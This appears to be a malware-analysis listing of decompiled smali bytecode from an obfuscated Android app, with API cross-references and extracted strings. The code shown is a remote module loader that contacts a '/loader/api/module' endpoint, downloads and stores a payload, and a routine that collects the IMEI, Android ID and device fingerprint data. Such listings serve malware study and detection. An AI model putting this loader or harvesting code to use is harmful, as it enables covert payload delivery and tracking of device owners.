264sget-object v4, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->DiXsQ:Ljava/lang/String;
266invoke-interface {v2, v3, v4}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
267move-result-object v2
269sget-object v3, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->DiXsQ:Ljava/lang/String;
271invoke-virtual {v2, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
272move-result v2
273if-eqz v2, :cond_191
274new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/UBLcF;
276invoke-direct {v1, v0}, Lcom/czybg/eqtbdmzpklrgyns/UBLcF;-><init>(Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;)V
277sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
278const/16 v2, 0xb
279if-lt v0, v2, :cond_18a
281sget-object v0, Landroid/os/AsyncTask;->THREAD_POOL_EXECUTOR:Ljava/util/concurrent/Executor;
282new-array v2, v11, [Ljava/lang/String;
284invoke-virtual {v1, v0, v2}, Landroid/os/AsyncTask;->executeOnExecutor(Ljava/util/concurrent/Executor;[Ljava/lang/Object;)Landroid/os/AsyncTask;
285goto/16 :goto_b6
286cond_18a: new-array v0, v11, [Ljava/lang/String;
288invoke-virtual {v1, v0}, Landroid/os/AsyncTask;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask;
289goto/16 :goto_b6
290cond_191:
291iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->Odjrct:Landroid/content/SharedPreferences;
293const-string v2, "snt"
295sget-object v3, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->DiXsQ:Ljava/lang/String;
297invoke-interface {v0, v2, v3}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
298move-result-object v0
300invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->DiXsQ(Ljava/lang/String;)Lcom/czybg/eqtbdmzpklrgyns/LfxjW;
301move-result-object v0
303invoke-interface {v1, v0}, Lcom/czybg/eqtbdmzpklrgyns/iUhPN;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/LfxjW;)V
304goto/16 :goto_b6
305cond_1a4:
306invoke-direct {p0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->hZyMGHgz()V
307goto/16 :goto_b6
308catch_1a9: move-exception v0
309goto/16 :goto_147
Cross References
APIs
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.net.URL.<init>
  • java.net.URL.openConnection
  • android.content.Context.getPackageName
  • javax.net.ssl.HttpsURLConnection.addRequestProperty
  • javax.net.ssl.HttpsURLConnection.setRequestMethod
  • javax.net.ssl.HttpsURLConnection.setDoOutput
  • javax.net.ssl.HttpsURLConnection.setConnectTimeout
  • javax.net.ssl.HttpsURLConnection.setReadTimeout
  • org.json.JSONObject.toString
  • java.lang.String.getBytes
  • javax.net.ssl.HttpsURLConnection.getResponseCode
  • java.lang.StringBuilder.<init>
  • javax.net.ssl.HttpsURLConnection.getResponseCode
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.io.IOException.<init>
  • java.lang.Exception.printStackTrace
  • javax.net.ssl.HttpsURLConnection.getHeaderFieldInt
  • com.czybg.eqtbdmzpklrgyns.szqyx.<init>
  • javax.net.ssl.HttpsURLConnection.getHeaderFieldInt
  • javax.net.ssl.HttpsURLConnection.getHeaderField
  • android.content.Context.getFilesDir
  • java.io.File.<init>
  • java.io.FileOutputStream.<init>
  • java.io.ByteArrayOutputStream.toByteArray
  • javax.crypto.Cipher.getInstance
  • javax.crypto.spec.IvParameterSpec.<init>
  • javax.crypto.Cipher.init
  • javax.crypto.Cipher.doFinal
  • java.io.FileOutputStream.write
Strings
  • /loader/api/module?type=
  • pkg
  • sid
  • tag
  • POST
  • invalid status code:
  • delay
  • type
  • act
  • hash
  • scp
Position Instruction Meta Information
0const/4 v5, 0x1
1const/4 v2, 0x0
2try_start_2: new-instance v0, Ljava/net/URL;
3new-instance v1, Ljava/lang/StringBuilder;
5invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
7invoke-static {}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ()Ljava/lang/String;
8move-result-object v3
10invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
11move-result-object v1
13const-string v3, "/loader/api/module?type="
15invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
16move-result-object v1
17iget v3, p0, Lcom/czybg/eqtbdmzpklrgyns/MfOxe;->DiXsQ:I
19invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
20move-result-object v1
22invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
23move-result-object v1
25invoke-direct {v0, v1}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
27invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
28move-result-object v0
29check-cast v0, Ljavax/net/ssl/HttpsURLConnection;
31const-string v1, "pkg"
33iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/MfOxe;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
35iget-object v3, v3, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->LmcGi:Landroid/content/Context;
37invoke-virtual {v3}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
38move-result-object v3
40invoke-virtual {v0, v1, v3}, Ljavax/net/ssl/HttpsURLConnection;->addRequestProperty(Ljava/lang/String;Ljava/lang/String;)V
42const-string v1, "sid"
44iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/MfOxe;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
46iget-object v3, v3, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->DiXsQ:Ljava/lang/String;
48invoke-virtual {v0, v1, v3}, Ljavax/net/ssl/HttpsURLConnection;->addRequestProperty(Ljava/lang/String;Ljava/lang/String;)V
50const-string v1, "tag"
52iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/MfOxe;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
54iget-object v3, v3, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->Odjrct:Ljava/lang/String;
56invoke-virtual {v0, v1, v3}, Ljavax/net/ssl/HttpsURLConnection;->addRequestProperty(Ljava/lang/String;Ljava/lang/String;)V
58const-string v1, "POST"
60invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setRequestMethod(Ljava/lang/String;)V
61const/4 v1, 0x1
63invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setDoOutput(Z)V
64const/16 v1, 0x7530
66invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setConnectTimeout(I)V
67const/16 v1, 0x7530
69invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setReadTimeout(I)V
71invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->DiXsQ(Ljava/net/URLConnection;)V
73iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/MfOxe;->Odjrct:Lorg/json/JSONObject;
75invoke-virtual {v1}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
76move-result-object v1
78invoke-virtual {v1}, Ljava/lang/String;->getBytes()[B
79move-result-object v1
81invoke-static {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->DiXsQ(Ljava/net/URLConnection;[B)V
83invoke-virtual {v0}, Ljavax/net/ssl/HttpsURLConnection;->getResponseCode()I
84move-result v1
85const/16 v3, 0xc8
86if-eq v1, v3, :cond_98
87new-instance v1, Ljava/io/IOException;
88new-instance v2, Ljava/lang/StringBuilder;
90const-string v3, "invalid status code: "
92invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
94invoke-virtual {v0}, Ljavax/net/ssl/HttpsURLConnection;->getResponseCode()I
95move-result v0
97invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
98move-result-object v0
100invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
101move-result-object v0
103invoke-direct {v1, v0}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
104throw v1
105catch_8d: move-exception v0
106move-object v1, v0
108invoke-virtual {v1}, Ljava/lang/Exception;->printStackTrace()V
109new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;
111invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;-><init>(Ljava/lang/Exception;)V
112goto_97: return-object v0
113cond_98:
114const-string v1, "delay"
115const/4 v3, 0x0
117invoke-virtual {v0, v1, v3}, Ljavax/net/ssl/HttpsURLConnection;->getHeaderFieldInt(Ljava/lang/String;I)I
118move-result v1
119if-lez v1, :cond_a7
120new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/szqyx;
122invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/szqyx;-><init>(I)V
123throw v0
124cond_a7:
125const-string v1, "type"
126const/4 v3, 0x0
128invoke-virtual {v0, v1, v3}, Ljavax/net/ssl/HttpsURLConnection;->getHeaderFieldInt(Ljava/lang/String;I)I
129move-result v1
131const-string v3, "act"
132const/4 v4, 0x0
134invoke-virtual {v0, v3, v4}, Ljavax/net/ssl/HttpsURLConnection;->getHeaderFieldInt(Ljava/lang/String;I)I
135move-result v3
136if-eqz v3, :cond_12a
137goto_b7:
138const-string v2, "hash"
140invoke-virtual {v0, v2}, Ljavax/net/ssl/HttpsURLConnection;->getHeaderField(Ljava/lang/String;)Ljava/lang/String;
141move-result-object v2
143const-string v3, "pkg"
145invoke-virtual {v0, v3}, Ljavax/net/ssl/HttpsURLConnection;->getHeaderField(Ljava/lang/String;)Ljava/lang/String;
146move-result-object v3
148const-string v4, "scp"
150invoke-virtual {v0, v4}, Ljavax/net/ssl/HttpsURLConnection;->getHeaderField(Ljava/lang/String;)Ljava/lang/String;
151move-result-object v4
153invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->Odjrct(Ljava/net/URLConnection;)Ljava/io/ByteArrayOutputStream;
154move-result-object v0
155new-instance v6, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;
157invoke-static {}, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;->DiXsQ()Ljava/security/Key;
158move-result-object v7
160invoke-direct {v6, v7}, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;-><init>(Ljava/security/Key;)V
161new-instance v7, Ljava/io/File;
163iget-object v8, p0, Lcom/czybg/eqtbdmzpklrgyns/MfOxe;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
165iget-object v8, v8, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->LmcGi:Landroid/content/Context;
167invoke-virtual {v8}, Landroid/content/Context;->getFilesDir()Ljava/io/File;
168move-result-object v8
169const/16 v9, 0xa
171invoke-static {v9}, Lcom/czybg/eqtbdmzpklrgyns/jVOak;->DiXsQ(I)Ljava/lang/String;
172move-result-object v9
174invoke-direct {v7, v8, v9}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
175new-instance v8, Ljava/io/FileOutputStream;
177invoke-direct {v8, v7}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
179invoke-virtual {v0}, Ljava/io/ByteArrayOutputStream;->toByteArray()[B
180move-result-object v0
181const/16 v9, 0x10
183invoke-static {v9}, Lcom/czybg/eqtbdmzpklrgyns/jVOak;->Odjrct(I)[B
184move-result-object v9
186sget-object v10, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;->DiXsQ:Ljava/lang/String;
188invoke-static {v10}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;
189move-result-object v10
190const/4 v11, 0x1
192iget-object v12, v6, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;->Odjrct:Ljava/security/Key;
193new-instance v13, Ljavax/crypto/spec/IvParameterSpec;
195invoke-direct {v13, v9}, Ljavax/crypto/spec/IvParameterSpec;-><init>([B)V
197invoke-virtual {v10, v11, v12, v13}, Ljavax/crypto/Cipher;->init(ILjava/security/Key;Ljava/security/spec/AlgorithmParameterSpec;)V
199invoke-virtual {v10, v0}, Ljavax/crypto/Cipher;->doFinal([B)[B
200move-result-object v0
202invoke-static {v9, v0}, Lcom/czybg/eqtbdmzpklrgyns/hZyMGHgz;->DiXsQ([B[B)[B
203move-result-object v0
205invoke-virtual {v8, v0}, Ljava/io/FileOutputStream;->write([B)V
206new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/qaNho;
208invoke-direct/range {v0 .. v5}, Lcom/czybg/eqtbdmzpklrgyns/qaNho;-><init>(ILjava/lang/String;Ljava/lang/String;Ljava/lang/String;Z)V
209new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;
210new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/Module;
212iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/MfOxe;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
214iget-object v3, v3, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->LmcGi:Landroid/content/Context;
216invoke-direct {v2, v3, v6, v7, v0}, Lcom/czybg/eqtbdmzpklrgyns/Module;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;Ljava/io/File;Lcom/czybg/eqtbdmzpklrgyns/qaNho;)V
218invoke-direct {v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;-><init>(Ljava/lang/Object;)V
219try_end_127: move-object v0, v1
220goto/16 :goto_97
221cond_12a: move v5, v2
222goto/16 :goto_b7
Cross References
APIs
  • java.lang.Object.<init>
  • android.telephony.TelephonyManager.getDeviceId
  • java.lang.String.isEmpty
  • android.content.SharedPreferences.edit
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.commit
  • java.lang.String.isEmpty
  • android.content.SharedPreferences.getString
  • android.text.TextUtils.isEmpty
  • android.content.Context.getContentResolver
  • android.provider.Settings$Secure.getString
  • java.lang.StringBuilder.<init>
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.String.length
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.util.Locale.getDefault
  • java.util.Locale.getDisplayLanguage
  • java.lang.String.valueOf
  • java.lang.System.currentTimeMillis
Strings
  • imei
  • android_id
  • 35
Position Instruction Meta Information
0const/4 v2, 0x0
1iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->VvXSDk:Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;
3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
5const-string v0, ""
6iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DiXsQ:Ljava/lang/String;
8const-string v0, ""
9iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->Odjrct:Ljava/lang/String;
11const-string v0, ""
12iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->LmcGi:Ljava/lang/String;
14const-string v0, ""
15iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->hZyMGHgz:Ljava/lang/String;
17const-string v0, ""
18iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->xnLvoQ:Ljava/lang/String;
20const-string v0, ""
21iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->jVOak:Ljava/lang/String;
22iput v2, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->CyGFDR:I
23iput-boolean v2, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->EZmcnv:Z
25const-string v0, ""
26iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->phHwgb:Ljava/lang/String;
28const-string v0, ""
29iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->uKFQsLn:Ljava/lang/String;
31const-string v0, ""
32iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->lVfyLT:Ljava/lang/String;
34const-string v0, ""
35iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->xfPEz:Ljava/lang/String;
37const-string v0, ""
38iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->IwTvjRW:Ljava/lang/String;
40const-string v0, ""
41iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DoHnmwOG:Ljava/lang/String;
42const-wide/16 v0, 0x0
43iput-wide v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->FySkt:J
45const-string v0, ""
46iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->TikzFyJI:Ljava/lang/String;
47iput v2, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->ciatqPxI:I
48try_start_44:
49invoke-virtual {p3}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
50move-result-object v0
51iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DiXsQ:Ljava/lang/String;
53iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DiXsQ:Ljava/lang/String;
54if-eqz v0, :cond_69
56iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DiXsQ:Ljava/lang/String;
58invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
59move-result v0
60if-nez v0, :cond_69
62iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;
64iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DiXsQ:Ljava/lang/String;
66iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;->DiXsQ:Landroid/content/SharedPreferences;
68invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
69move-result-object v0
71const-string v2, "imei"
73invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
74move-result-object v0
76invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
77cond_69:
78iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DiXsQ:Ljava/lang/String;
79if-eqz v0, :cond_75
81iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DiXsQ:Ljava/lang/String;
83invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
84move-result v0
85if-eqz v0, :cond_83
86cond_75:
87iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;
89iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;->DiXsQ:Landroid/content/SharedPreferences;
91const-string v1, "imei"
93const-string v2, ""
95invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
96move-result-object v0
97iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DiXsQ:Ljava/lang/String;
98goto_83:
99invoke-static {}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi()Ljava/lang/String;
100move-result-object v0
102invoke-static {v0}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
103move-result v1
104if-eqz v1, :cond_91
106invoke-virtual {p4}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->Odjrct()Ljava/lang/String;
107move-result-object v0
108cond_91: iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->Odjrct:Ljava/lang/String;
109try_end_93:
110invoke-static {p2}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi(Landroid/content/Context;)Ljava/lang/String;
111move-result-object v0
112iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->TikzFyJI:Ljava/lang/String;
113try_end_99:
114invoke-virtual {p2}, Landroid/content/Context;->getContentResolver()Landroid/content/ContentResolver;
115move-result-object v0
117const-string v1, "android_id"
119invoke-static {v0, v1}, Landroid/provider/Settings$Secure;->getString(Landroid/content/ContentResolver;Ljava/lang/String;)Ljava/lang/String;
120move-result-object v0
121iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->xnLvoQ:Ljava/lang/String;
123invoke-static {p2}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ(Landroid/content/Context;)I
124move-result v0
125iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->ciatqPxI:I
126new-instance v0, Ljava/lang/StringBuilder;
128const-string v1, "35"
130invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
132sget-object v1, Landroid/os/Build;->BOARD:Ljava/lang/String;
134invoke-virtual {v1}, Ljava/lang/String;->length()I
135move-result v1
136rem-int/lit8 v1, v1, 0xa
138invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
139move-result-object v0
141sget-object v1, Landroid/os/Build;->BRAND:Ljava/lang/String;
143invoke-virtual {v1}, Ljava/lang/String;->length()I
144move-result v1
145rem-int/lit8 v1, v1, 0xa
147invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
148move-result-object v0
150sget-object v1, Landroid/os/Build;->CPU_ABI:Ljava/lang/String;
152invoke-virtual {v1}, Ljava/lang/String;->length()I
153move-result v1
154rem-int/lit8 v1, v1, 0xa
156invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
157move-result-object v0
159sget-object v1, Landroid/os/Build;->DEVICE:Ljava/lang/String;
161invoke-virtual {v1}, Ljava/lang/String;->length()I
162move-result v1
163rem-int/lit8 v1, v1, 0xa
165invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
166move-result-object v0
168sget-object v1, Landroid/os/Build;->DISPLAY:Ljava/lang/String;
170invoke-virtual {v1}, Ljava/lang/String;->length()I
171move-result v1
172rem-int/lit8 v1, v1, 0xa
174invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
175move-result-object v0
177sget-object v1, Landroid/os/Build;->HOST:Ljava/lang/String;
179invoke-virtual {v1}, Ljava/lang/String;->length()I
180move-result v1
181rem-int/lit8 v1, v1, 0xa
183invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
184move-result-object v0
186sget-object v1, Landroid/os/Build;->ID:Ljava/lang/String;
188invoke-virtual {v1}, Ljava/lang/String;->length()I
189move-result v1
190rem-int/lit8 v1, v1, 0xa
192invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
193move-result-object v0
195sget-object v1, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
197invoke-virtual {v1}, Ljava/lang/String;->length()I
198move-result v1
199rem-int/lit8 v1, v1, 0xa
201invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
202move-result-object v0
204sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String;
206invoke-virtual {v1}, Ljava/lang/String;->length()I
207move-result v1
208rem-int/lit8 v1, v1, 0xa
210invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
211move-result-object v0
213sget-object v1, Landroid/os/Build;->PRODUCT:Ljava/lang/String;
215invoke-virtual {v1}, Ljava/lang/String;->length()I
216move-result v1
217rem-int/lit8 v1, v1, 0xa
219invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
220move-result-object v0
222sget-object v1, Landroid/os/Build;->TAGS:Ljava/lang/String;
224invoke-virtual {v1}, Ljava/lang/String;->length()I
225move-result v1
226rem-int/lit8 v1, v1, 0xa
228invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
229move-result-object v0
231sget-object v1, Landroid/os/Build;->TYPE:Ljava/lang/String;
233invoke-virtual {v1}, Ljava/lang/String;->length()I
234move-result v1
235rem-int/lit8 v1, v1, 0xa
237invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
238move-result-object v0
240sget-object v1, Landroid/os/Build;->USER:Ljava/lang/String;
242invoke-virtual {v1}, Ljava/lang/String;->length()I
243move-result v1
244rem-int/lit8 v1, v1, 0xa
246invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
247move-result-object v0
249invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
250move-result-object v0
251iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->jVOak:Ljava/lang/String;
253invoke-static {}, Ljava/util/Locale;->getDefault()Ljava/util/Locale;
254move-result-object v0
256invoke-virtual {v0}, Ljava/util/Locale;->getDisplayLanguage()Ljava/lang/String;
257move-result-object v0
258iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->hZyMGHgz:Ljava/lang/String;
260sget-object v0, Landroid/os/Build$VERSION;->RELEASE:Ljava/lang/String;
261iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->LmcGi:Ljava/lang/String;
262sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
263iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->CyGFDR:I
265invoke-static {p2}, Lcom/czybg/eqtbdmzpklrgyns/xnLvoQ;->DiXsQ(Landroid/content/Context;)Z
266move-result v0
267iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->EZmcnv:Z
269sget-object v0, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
270if-eqz v0, :cond_1a4
272sget-object v0, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
273goto_172: iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->phHwgb:Ljava/lang/String;
275sget-object v0, Landroid/os/Build;->MODEL:Ljava/lang/String;
276if-eqz v0, :cond_1a7
278sget-object v0, Landroid/os/Build;->MODEL:Ljava/lang/String;
279goto_17a: iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->uKFQsLn:Ljava/lang/String;
281invoke-virtual {p4}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->hZyMGHgz()Ljava/lang/String;
282move-result-object v0
283iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->lVfyLT:Ljava/lang/String;
285invoke-virtual {p4}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->xnLvoQ()I
286move-result v0
288invoke-static {v0}, Ljava/lang/String;->valueOf(I)Ljava/lang/String;
289move-result-object v0
290iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->xfPEz:Ljava/lang/String;
291try_start_18c:
292invoke-virtual {p4}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->jVOak()Ljava/lang/String;
293move-result-object v0
294iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->IwTvjRW:Ljava/lang/String;
295try_end_192:
296invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
297move-result-wide v0
298const-wide/16 v2, 0x3e8
299div-long/2addr v0, v2
300long-to-int v0, v0
301int-to-long v0, v0
302iput-wide v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->FySkt:J
303return-void
304catch_19e: move-exception v0
306invoke-static {v0}, Lmpcom/crashlytics/android/Crashlytics;->logException(Ljava/lang/Throwable;)V
307goto/16 :goto_83
308cond_1a4:
309const-string v0, ""
310goto/16 :goto_172
311cond_1a7:
312const-string v0, ""
313goto/16 :goto_17a
314catch_1aa: move-exception v0
315goto/16 :goto_192
316catch_1ac: move-exception v0
317goto/16 :goto_99
318catch_1af: move-exception v0
319goto/16 :goto_93
Cross References
APIs
  • android.content.Context.getFilesDir
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • com.czybg.eqtbdmzpklrgyns.cXdqo.DiXsQ
  • java.util.ArrayList.size
